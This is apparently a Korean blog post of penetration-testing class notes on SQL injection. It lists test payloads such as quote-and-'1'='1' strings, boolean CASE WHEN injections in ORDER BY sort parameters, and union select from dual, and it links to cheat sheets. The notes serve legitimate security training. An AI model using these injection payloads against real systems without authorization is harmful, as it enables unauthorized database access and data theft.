<SQL Injecion TIP>
SQL는 주로 id 기능에서 가능아이디 끝에 ' ' / %2b / %252b' and '1'='1' aNd '1'='1' &(%26) '1'='1안되는 경우
(1) PreparedStatement (공격 XXX)
(2) 작은 따옴표 우회 ->
문자열이 아닌곳에서 테스트- Column 이름- 테이블 이름-Order by 정렬
sort_column: title, namesort_type: asc/descsort_column: title, 9999sort_type=, 9999 asc입력해본다
.sort_type=,(case when (1=1) then 1 else 9999 end) asc결과시 '1', '9999'select 1 from dual(가상테이블)
union select 2 from dual응용문: (case when (1=1) then 1 else select 1 from dual(가상테이블)
union select 2 from dual end) asc에러유발이 안될때 일부로 에러유발을 유도할 수 있다.
12id = SQL injecton 가능option_val=username&board_result& ~~구조를 파악한다.
where $option_val like '%S%' '%$board_result%' and board_search=''"&between <><> 파라미터 option_val=(1=1) / option_val=(1=2)너무 많이 나왔을 경우 하나만 대표로 작성한다.
참고할 URL
SQL 보고서 작성(union부터 있음)
https://myungjjju.tistory.com/69?category=966817
SQL LOS 정리
https://01092090536.tistory.com/65
SQL sheet
https://security04.tistory.com/171
https://dorahee.tistory.com/140
%aa
'Web hacking > Nomaltic) 웹 해킹 수업 노트 👩💻' 카테고리의 다른 글
| [20주차] 모바일 앱 해킹 공부 가이드 (0) | 2022.03.03 |
|---|---|
| [19주차] 기본 지식 복습 (0) | 2022.02.24 |
| [18주차] 모의해킹 직무 면접 준비 (0) | 2022.02.18 |
| [18주차]SSI Injection 취약점 (0) | 2022.02.17 |
| [17주차] 보고서 리뷰(팁, 예상질문) (0) | 2022.02.10 |
